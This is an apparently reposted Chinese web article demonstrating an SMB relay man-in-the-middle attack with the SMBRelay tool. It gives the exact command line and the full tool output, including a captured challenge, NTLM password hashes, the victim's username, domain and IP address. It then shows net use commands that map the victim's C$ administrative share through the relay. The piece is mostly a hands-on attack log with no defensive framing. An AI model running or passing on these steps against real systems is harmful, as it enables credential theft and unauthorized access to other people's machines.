SMBRELAY终极应用
发布时间:2019-11-26 00:21:50 所属栏目:趣闻 来源:本站整理
导读:,SMBRELAY终极应用
说明::这次攻击过程只需要2台机器,3个IP地址 关于协议与IP问题的说明: 我的IP是218.197.248.212,可是SMBRELAY无法运行在这个IP上,而且我只有把自己机器上“打印机与文件共享”服务删除后才能接受目标机器传来的HASH,218.197.248.154是一个不存在的IP地址,所以我把SMBRELAY绑在218.197.248.154上,测试的时候,实际上是 212(我自己)-----154(绑SMBRELAY的机器)----249(受害机器) ---------------------------------------------------------------------D:>smbrelay.exe /IL 2 /IR 2 /L+ 218.197.248.154 /R- 218.197.248.154 SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.com Using local adapter index 2: PCI Bus Master Adapter Local IP address added to interface 2 Bound to port 139 on address 218.197.248.154 Connection from 202.114.28.249:1915 Request type: Session Request 72 bytes Source name: VODSER <00> Target name: *SMBSERVER <20> Setting target name to source name and source name to <|>CDC4EVER<|>... Response: Positive Session Response 4 bytes Request type: Session Message 137 bytes SMB_COM_NEGOTIATE Response: Session Message 115 bytes Challenge (8 bytes): 33C0E036880693BB Request type: Session Message 290 bytes SMB_COM_SESSION_SETUP_ANDX Password lengths: 24 24 Case insensitive password: FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874 Case sensitive password: E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585 Username: "UUSER_VODSER" Domain: "VODSER" OS: "Windows 2000 2195" Lanman type: "Windows 2000 5.0" ???: "" Response: Session Message 154 bytes OS: "Windows 5.0" Lanman type: "Windows 2000 LAN Manager" Domain: "WORKGROUP" Password hash written to disk Connected? Bound to port 139 on address 218.197.248.154 relaying for host VODSER 202.114.28 .249 -------------------------------------------------------------------------------- 这时候,我已经抓到对方HASH了,下面是影射对方C盘 ---------------------------------------- E:>net use 218.197.248.154 命令成功完成。 E:>net use h: 218.197.248.154c$ 命令成功完成。 ---------------------------------------------------------------------------- 第一屏的显示如下 --------------------------------------------------------- Connection rejected: 202.114.28.249 already connected *** Relay connection for target VODSER received from 218.197.248.212:1615 *** Sent positive session response for relay target VODSER *** Sent dialect selection response (5) for target VODSER *** Sent SMB Session setup response for relay to VODSER Termination requested... Deleted incoming IP address *** Relay disconnected from target VODSER *** Target VODSER Disconnected Exiting main ------------------------------------------------------------------------- (编辑:555手机网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |